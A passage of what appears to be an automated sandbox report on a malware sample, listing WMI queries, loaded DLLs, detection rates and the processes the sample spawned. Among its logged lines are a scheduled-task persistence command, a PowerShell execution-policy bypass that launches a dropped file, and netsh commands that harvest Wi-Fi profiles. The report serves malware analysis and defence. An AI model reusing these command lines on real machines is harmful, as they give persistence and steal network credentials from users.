                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\relog.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: tmp835C.tmp.dat.9.dr, tmpA679.tmp.dat.39.dr, tmpA321.tmp.dat.10.dr, tmp7708.tmp.dat.6.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: xj40xovMsm.exeReversingLabs: Detection: 70%
                      Source: xj40xovMsm.exeVirustotal: Detection: 36%
                      Source: xj40xovMsm.exeString found in binary or memory: ComboBox2-START
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile read: C:\Users\user\Desktop\xj40xovMsm.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\xj40xovMsm.exe "C:\Users\user\Desktop\xj40xovMsm.exe"
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe"
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe "C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe"
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe "C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 7
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe "C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe "C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe "C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe"
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Desktop\xj40xovMsm.exe "C:\Users\user\Desktop\xj40xovMsm.exe"
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\jqnnpe.exe "C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe "C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe "C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe "C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe "C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe "C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe "C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Desktop\xj40xovMsm.exe "C:\Users\user\Desktop\xj40xovMsm.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 7
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\jqnnpe.exe "C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\relog.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
